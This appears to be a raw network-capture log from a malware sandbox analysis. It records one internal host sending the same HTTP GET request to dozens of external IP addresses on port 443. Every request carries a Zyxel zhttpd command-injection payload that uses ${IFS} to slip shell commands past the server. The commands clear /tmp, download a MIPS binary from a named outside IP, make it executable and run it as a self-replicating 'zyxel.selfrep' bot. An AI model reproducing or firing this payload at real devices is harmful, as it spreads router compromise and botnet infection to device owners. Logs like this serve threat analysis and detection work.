                                                Jan 12, 2024 18:24:34.809634924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4222192.168.2.134221298.195.116.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809684992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4223192.168.2.135904098.146.45.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809715986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4224192.168.2.1333864145.124.108.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809760094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4225192.168.2.13335829.8.29.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809789896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4226192.168.2.135050263.183.215.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809832096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4227192.168.2.1341824113.15.218.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809873104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4228192.168.2.1351088175.197.51.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809899092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4229192.168.2.1357534182.12.102.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809959888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4230192.168.2.133693279.211.86.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.809997082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4231192.168.2.1360268179.154.81.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810065985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4232192.168.2.135615873.58.143.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810091972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4233192.168.2.135670881.136.178.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810149908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4234192.168.2.134147045.154.82.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810197115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4235192.168.2.1359266164.247.100.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810228109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4236192.168.2.1359780170.178.83.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810290098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4237192.168.2.135988687.38.1.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810327053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4238192.168.2.1348454152.7.135.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810359001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4239192.168.2.1343070156.43.106.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810405970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4240192.168.2.135551865.68.124.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810452938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4241192.168.2.133836459.113.142.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810497046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4242192.168.2.1334752169.116.188.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810529947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4243192.168.2.1354774191.145.83.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810575008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4244192.168.2.1346002179.167.98.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810621977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4245192.168.2.135424463.175.13.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810653925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4246192.168.2.135282018.32.92.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810698986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4247192.168.2.13519561.180.10.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810744047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4248192.168.2.135577693.182.160.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810789108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4249192.168.2.1342666105.109.27.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810807943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4250192.168.2.1353948167.99.102.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810847998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4251192.168.2.1347982152.149.174.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810868979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4252192.168.2.135619459.232.36.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810898066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4253192.168.2.135467296.104.40.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810935020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4254192.168.2.135143084.41.242.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.810966015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4255192.168.2.135395878.79.107.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811019897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4256192.168.2.1346802133.143.175.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811059952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4257192.168.2.135209423.124.253.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811095953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4258192.168.2.135638276.230.43.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811146021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4259192.168.2.1340136132.86.66.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811177015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4260192.168.2.1336816200.38.107.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811217070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4261192.168.2.1351618179.182.229.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811255932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4262192.168.2.1336796150.169.216.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811291933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4263192.168.2.1339882139.178.204.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.811311007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4264192.168.2.134727853.163.155.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814759016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4265192.168.2.135872449.5.202.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814795017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4266192.168.2.135791831.54.199.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814847946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4267192.168.2.1340338213.250.83.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814881086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4268192.168.2.1350218149.81.247.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814933062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4269192.168.2.134326493.207.146.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814968109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4270192.168.2.1339644132.26.162.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.814996958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4271192.168.2.1341618162.246.15.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:34.815047979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4272192.168.2.135206634.73.54.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826231956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4273192.168.2.1359474203.205.124.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826344967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4274192.168.2.1333730196.245.187.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826400042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4275192.168.2.135299846.200.97.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826446056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4276192.168.2.135097067.108.46.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826508045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4277192.168.2.1355354140.31.39.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826560974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4278192.168.2.135566444.6.127.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826630116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4279192.168.2.1360794109.244.243.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826667070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4280192.168.2.133788842.250.72.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826731920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4281192.168.2.1344432220.45.172.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826771975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4282192.168.2.133844084.197.53.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826812029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4283192.168.2.1336838145.241.164.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:35.826838017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4284192.168.2.1341954115.217.191.25443
                                                TimestampBytes transferredDirectionData
